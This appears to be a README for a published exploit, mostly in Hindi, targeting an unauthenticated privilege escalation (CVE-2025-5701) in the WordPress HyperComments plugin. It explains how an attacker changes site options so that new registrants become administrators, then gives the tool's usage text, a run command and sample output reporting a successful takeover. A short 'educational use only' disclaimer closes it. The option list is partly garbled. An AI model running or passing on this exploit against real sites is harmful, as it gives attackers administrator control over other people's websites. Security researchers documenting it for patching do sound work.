
WordPress HyperComments Plugin <= 1.2.2 विशेषाधिकार वृद्धि के लिए संवेदनशील है।
गंभीरता: गंभीर (CVSS 9.8)
प्रभावित प्लगइन: HyperComments for WordPress
प्रभावित संस्करण: ≤ 1.2.2
WordPress के लिए HyperComments प्लगइन hc_request_handler फ़ंक्शन में क्षमता जांच की कमी के कारण WordPress विकल्पों में अनधिकृत संशोधन के लिए असुरक्षित है। यह अप्रमाणित हमलावरों को मनमाने WordPress विकल्पों को अपडेट करने की अनुमति देता है, जैसे:
users_can_register)default_role)इन्हें एक साथ जोड़कर, एक हमलावर पंजीकरण सक्षम कर सकता है और सुनिश्चित कर सकता है कि कोई भी नया उपयोगकर्ता स्वचालित रूप से प्रशासक भूमिका प्राप्त करे।
CVSS v3.1: 9.8 CRITICAL
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit
By: Khaled Alenazi (Nxploited)
usage: CVE-2025-5701.py [-h] -u URL
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g., http://target-site.com)
python3 CVE-2025-5701.py -u http://target-site.com
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit
By: Khaled Alenazi (Nxploited)
[+] Target is vulnerable (version: 1.2.2) - proceeding with exploitation.
[+] Exploit endpoint is accessible.
[+] Server response: {"result":"success"}
[+] Registration is now enabled. New users will be assigned administrator role.
[+] Register here: http://target-site.com/wp-login.php?action=register
Exploit by: Khaled Alenazi (Nxploited)
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। अनुमति के बिना सिस्टम में अनधिकृत पहुंच अवैध और अनैतिक है। केवल नियंत्रित वातावरण में या स्पष्ट प्राधिकरण के साथ उपयोग करें।
Nxploited (Khaled_alenazi)